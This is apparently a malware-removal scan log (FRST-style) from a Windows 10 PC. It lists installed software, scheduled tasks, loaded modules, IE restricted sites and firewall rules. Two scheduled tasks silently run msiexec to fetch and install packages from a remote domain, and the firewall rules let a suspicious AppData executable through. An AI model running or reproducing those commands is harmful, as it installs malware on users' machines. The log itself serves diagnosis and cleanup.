Mozilla Firefox 59.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 59.0.2 (x64 en-US)) (Version: 59.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 59.0.2.6656 - Mozilla)
NetTime (HKLM-x32\...\NetTime_is1) (Version: - Mark Griffiths)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0405-0000-0000000FF1CE}) (Version: 16.0.9126.2336 - Microsoft Corporation) Hidden
Port Royale V1.4.0.2 (HKLM-x32\...\Port Royale_is1) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.60 (17.03.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.82.00(27.07.2015) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.70.18.0 - Samsung Electronics Co., Ltd.)
Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.01.10 (20.06.2014) - Samsung Electronics Co., Ltd.)
Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.0.17 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.25 - Samsung Electronics Co., Ltd.) Hidden
Samsung SCX-3400 Series (HKLM-x32\...\Samsung SCX-3400 Series) (Version: 1.29 (09.09.2015) - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.)
Skype verze 8.33 (HKLM-x32\...\Skype_is1) (Version: 8.33 - Skype Technologies S.A.)
SMPlayer 17.1.0 (x64) (HKLM\...\SMPlayer) (Version: 17.1.0 - Ricardo Villalba)
SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd)
SoftPerfect WiFi Guard version 2.0.2 (HKLM\...\{38AFD787-4D2E-4442-92D2-7739F5F92CF4}_is1) (Version: 2.0.2 - SoftPerfect)
South Park The Fractured But Whole version 1.0 (HKLM\...\South Park The Fractured But Whole_is1) (Version: 1.0 - CODEPUNKS)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.2.1.8 - Synaptics Incorporated)
The Battle for Middle-earth (tm) II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version: - )
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9CBA860F-7437-4A75-941C-8EF559F2D145}) (Version: 2.52.0.0 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.4 - VideoLAN)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-195099987-321758953-278711717-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll [2015-08-04] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-05-18] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
Task: {0E14317D-2102-48FC-AAB8-68A9D0B3F691} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-06-24] (Realtek Semiconductor)
Task: {106A7FD6-C7D6-418B-AF21-09A77484159A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {16447E2A-F695-419E-8243-9BF676ECAD36} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {2208097B-6069-4E4E-B34D-B6C6499D266E} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-195099987-321758953-278711717-1001 => C:\Users\ulol\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {23D45486-6328-445F-8E32-ADBAA1F22487} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)
Task: {2BEBB49D-B57F-4F93-8080-66415D045BD2} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {598F7A69-A348-4C5E-A5CA-F3A37912C800} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-12-21] (Microsoft Corporation)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6A20F2C7-5CF8-4654-BAC1-A87B26620985} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-02-26] (Advanced Micro Devices, Inc.)
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {7F911834-FCA6-409C-A3A1-BBEFD2BE1E88} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {90DD05AC-EC80-4EB1-B27B-C21214053600} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {A5DAA59E-7902-47D5-B0FC-63D446828035} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
Task: {AD4942CE-F2AB-45E9-A0F7-A0A0696AF497} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2018-12-21] (Microsoft Corporation)
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {C51D1053-58AD-40DC-8AD7-42F044919F19} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-12-21] (Microsoft Corporation)
Task: {C8ED55E2-B8FB-4DD4-8E05-EB726C93E126} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-12-10] (Microsoft Corporation)
Task: {D643AA16-031E-4AF0-9CA3-98406A054B0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MpCmdRun.exe [2018-12-11] (Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2019-01-10 17:53 - 2018-11-15 11:01 - 002712432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-12 09:01 - 2018-11-09 03:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-01-09 12:59 - 2019-01-01 07:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-12-14 19:16 - 2018-12-14 19:21 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.36.52.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 000015872 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe
2018-10-09 12:41 - 2018-10-09 12:41 - 007562752 _____ () C:\Program Files\WindowsApps\Microsoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe\WhatsNew.Store.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com ->
www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com ->
www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com ->
www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com ->
www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com ->
www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com ->
www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com ->
www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com ->
www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com ->
www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info ->
www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com ->
www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com ->
www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com ->
www.123simsen.com
There are 7865 more sites.
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\008k.com ->
www.008k.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\00hq.com ->
www.00hq.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\0scan.com ->
www.0scan.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-2005-search.com ->
www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1-domains-registrations.com ->
www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1000gratisproben.com ->
www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\1001namen.com ->
www.1001namen.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\100sexlinks.com ->
www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\10sek.com ->
www.10sek.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123fporn.info ->
www.123fporn.info
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123haustiereundmehr.com ->
www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123moviedownload.com ->
www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-195099987-321758953-278711717-1001\...\123simsen.com ->
www.123simsen.com
There are 7865 more sites.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-195099987-321758953-278711717-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ulol\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
==================== MSCONFIG/TASK MANAGER disabled items ==
If an entry is included in the fixlist, it will be removed.
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "BlueStacks Agent"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\StartupApproved\Run: => "OneDrive"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [UDP Query User{680A3119-9C48-4A9D-8F3E-DCBBF626867E}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{9CD32ACD-CFD6-45A4-B4DF-C9EF3A4052CB}C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe] => (Block) C:\program files (x86)\kingdom come deliverance\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{0C967B64-CE0C-456C-B174-8178F48D6104}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [TCP Query User{D803BB9E-7542-4BAA-920B-DAA1792A535A}C:\program files (x86)\warcraft iii\war3.exe] => (Allow) C:\program files (x86)\warcraft iii\war3.exe
FirewallRules: [{74BBCAA8-0F85-4E7C-AB86-EBFEFC54D83F}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{EF7CD7A6-B6AD-4289-952D-49D310DF7E02}] => (Allow) C:\Program Files (x86)\Electronic Arts\The Battle for Middle-earth (tm) II\game.dat
FirewallRules: [{1F3F6959-FCD3-404A-95E2-17B36DCB540F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3B79ECD1-9CEC-4E00-B545-A2262DDC26BA}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [UDP Query User{6C071EF6-C6C0-4D88-B919-ACD84451EF09}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [TCP Query User{01339B68-9EF4-4C99-8E75-3C99DCBE8EF1}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Allow) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{418D3690-1654-4D36-9C65-E4881416F186}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{FD052E8D-5947-4005-9113-A4B0DA632966}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe
FirewallRules: [{865BC1B9-BDE3-408E-923A-336E538AB506}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2AC8C8A2-451C-4D9E-935F-4999B88AF985}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{2BA6C829-EF73-4535-A7F7-CA54E9CB4E93}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{2221AC8E-0468-49A9-A0AE-489AC315ADF2}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{BA30716E-B3D5-4765-BFD4-2BFAB06F3A6E}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{C5027FDD-ABB1-4575-9FEB-30CEF15A0174}] => (Allow) C:\Windows\twain_32\Samsung\SCX3400\SCNSearch\USDAgent.exe
FirewallRules: [{44620DE5-6297-4A22-853E-0F6BE8BC6C95}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{0125CC0F-2664-4DDC-8773-036A1480E45E}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{10FEC841-DB04-4EC4-B51B-926818D78CEF}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{1B2BD275-5E88-4056-97F9-B9F00CEF4644}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{DE602CDB-BEB2-49D6-8108-72A718061FA8}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{8D7B0C18-C2F1-4044-924F-CB7ABE7F31C5}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{65B2ED45-5E31-4CC1-92C6-8038109E3170}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{8AB3011A-5645-45FF-A547-B893F1D2B6BF}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{B4F4E17F-C2EF-4854-AD4C-8B2708E8AC1F}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{6FA07099-4EA9-452A-9FA8-995B59ECAE90}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{AC472FF0-E9BA-477F-8C59-E0CF6E26B1F6}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{29EB2B2E-4FA2-4FA9-ADB8-FB3EA85EE2C0}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{1B152717-C9E6-4543-87BB-5D4E311A0B0F}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [{100C66FD-2DCC-4B01-8D14-02FFD2C069A9}] => (Allow) C:\Users\ulol\AppData\Roaming\uTorrent\utorrent.exe
FirewallRules: [UDP Query User{632511C2-DDFC-4CEF-8C55-A82E8EB56B2A}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{809F3FAE-2B59-440B-8219-81CB5996542E}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{58ECFD65-9A3C-47BA-AB19-B2A27BACEC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3E457CE4-B263-445B-916E-10B85CEBE320}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [UDP Query User{80F90ED6-45B2-4117-84CF-FBCBE2F06D08}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [TCP Query User{5DAE795F-7DD0-4F03-A957-23178027EC7F}C:\program files (x86)\far cry primal\bin\fcprimal.exe] => (Allow) C:\program files (x86)\far cry primal\bin\fcprimal.exe
FirewallRules: [{76359A4C-3A58-4EE1-A908-4ADE16275DBF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{0FF7A781-7AB7-4397-B417-0E5504F6C62C}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [UDP Query User{946CEECC-8221-41F2-AF67-5BF9A2797A88}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{C8A027E8-6DAB-4F49-9015-1E2037DE8C23}C:\users\ulol\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\ulol\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{DFF9485B-1726-4727-ACCD-1E22F49A5F76}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0516401-11A3-4DCC-A5CB-691CF7FA910D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A8991BE6-8068-4C4F-8482-08861EAF061C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{3144E693-40E1-40BA-AD59-C5B0752F98E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{DE99C12C-1421-4D07-B3C1-5D2D854A4EFD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{76B4001E-0ACD-45A3-A91A-18D739417786}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{80E9FEE1-E9D6-415C-9E57-42C9395DCACF}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{420EDF67-B57A-4B23-B6AF-93ACAC9F0A06}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{5429A441-852D-4C25-B0E9-E8FCDF25881D}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{36A60251-4723-4B9D-95BF-290C0B9D73F2}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{F0DBA328-0448-42C9-81D0-3B92A1739F2E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [TCP Query User{FCDD228F-1357-42C4-A39B-A63F1B07F474}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [UDP Query User{6D3942CA-B064-4120-BD2B-6B02B318653B}C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe] => (Allow) C:\users\ulol\desktop\far cry 1 bez instalace (r) pc game\bin32\farcry.exe
FirewallRules: [{BF4317CC-2B83-4958-8B97-1061A97E93EE}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{BD7AE586-6CAC-4892-B735-4CA80B0D3D62}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
FirewallRules: [{8C18F3D0-FC27-424D-B0B3-02980A9FA42C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{4D7D2769-DF79-481A-9CBF-F959AED5BC99}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{35A3D09F-CE17-4CA2-94B6-F4247ED5F3EC}] => (Allow) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
FirewallRules: [{226B719A-7399-44FC-8195-1ECE66B04A97}] => (Allow) C:\WINDOWS\SysWOW64\xeAwY.exe
FirewallRules: [{B89F5B34-5FB4-44EA-80BB-D163442646A0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{E2EDB791-F173-4372-AC7B-034B9710C230}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{BC9DADB6-8473-43D2-96FD-FD726E9BB013}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{193F2B1F-0DA9-4711-887F-3ED626016202}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{9D2B0873-BC44-4EDC-95A6-643FB1055664}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CF7AEC5F-4D63-4972-AC11-1DCE22095F46}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{823D3430-D5F0-4AD2-BCF8-BB4839A12AB9}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
